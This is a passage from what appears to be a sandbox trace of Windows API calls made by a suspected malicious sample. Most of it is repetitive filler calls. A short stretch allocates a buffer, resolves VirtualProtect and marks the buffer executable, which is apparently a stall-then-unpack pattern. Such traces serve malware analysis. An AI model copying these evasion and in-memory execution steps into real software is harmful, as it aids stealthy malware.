lpszDst=0x0) returned 0 [0111.072] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.072] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.072] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.072] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.072] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.072] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.072] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.072] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.072] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.072] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.073] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.073] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.073] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.073] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.073] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.073] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.073] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.073] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.073] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.073] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.073] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.073] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.073] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.073] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.073] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.073] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.073] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.074] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.074] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.074] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.074] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.074] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.074] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.074] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.074] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.074] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.074] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.074] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.074] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.074] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.074] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.074] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.074] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.074] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.075] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.075] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.075] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.075] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.075] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.075] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.075] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.075] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.075] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.075] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.075] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.075] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.075] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.075] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.075] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.075] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.075] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.076] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.076] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.076] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.076] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.076] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.076] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.076] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.076] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.076] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.076] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.076] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.076] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.076] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.076] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.076] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.076] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.076] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.077] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.077] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.077] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.077] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.077] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.077] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.077] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.077] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.077] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.077] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.077] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.077] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.077] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.077] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.077] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.077] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.077] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.078] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.078] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.078] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.078] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.078] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.078] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.078] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.078] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.078] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0116.392] LocalAlloc (uFlags=0x0, uBytes=0x27f50) returned 0x8f23f8 [0116.423] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x752b0000 [0116.427] GetProcAddress (hModule=0x752b0000, lpProcName="") returned 0x0 [0116.427] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x752b0000 [0116.428] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtect") returned 0x752c4317 [0116.428] VirtualProtect (in: lpAddress=0x8f23f8, dwSize=0x27f50, flNewProtect=0x40, lpflOldProtect=0x18b688 | out: lpflOldProtect=0x18b688*=0x4) returned 1 [0116.436] SetLastError (dwErrCode=0x0) [0116.436] GetLastError () returned 0x0 [0116.436] SetLastError (dwErrCode=0x0) [0116.436] GetLastError () returned 0x0 [0116.436] SetLastError (dwErrCode=0x0) [0116.436] GetLastError () returned 0x0 [0116.436] SetLastError (dwErrCode=0x0) [0116.436] GetLastError () returned 0x0 [0116.436] SetLastError (dwErrCode=0x0) [0116.436] GetLastError () returned 0x0 [0116.436] SetLastError (dwErrCode=0x0) [0116.436] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.437] SetLastError (dwErrCode=0x0) [0116.437] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.438] SetLastError (dwErrCode=0x0) [0116.438] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.439] SetLastError (dwErrCode=0x0) [0116.439] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.440] SetLastError (dwErrCode=0x0) [0116.440] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.441] GetLastError () returned 0x0 [0116.441] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.442] SetLastError (dwErrCode=0x0) [0116.442] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.443] GetLastError () returned 0x0 [0116.443] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.444] SetLastError (dwErrCode=0x0) [0116.444] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.445] GetLastError () returned 0x0 [0116.445] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.447] SetLastError (dwErrCode=0x0) [0116.447] GetLastError () returned 0x0 [0116.448] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.450] GetLastError () returned 0x0 [0116.450] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.451] SetLastError (dwErrCode=0x0) [0116.451] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.452] SetLastError (dwErrCode=0x0) [0116.452] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 0x0 [0116.453] SetLastError (dwErrCode=0x0) [0116.453] GetLastError () returned 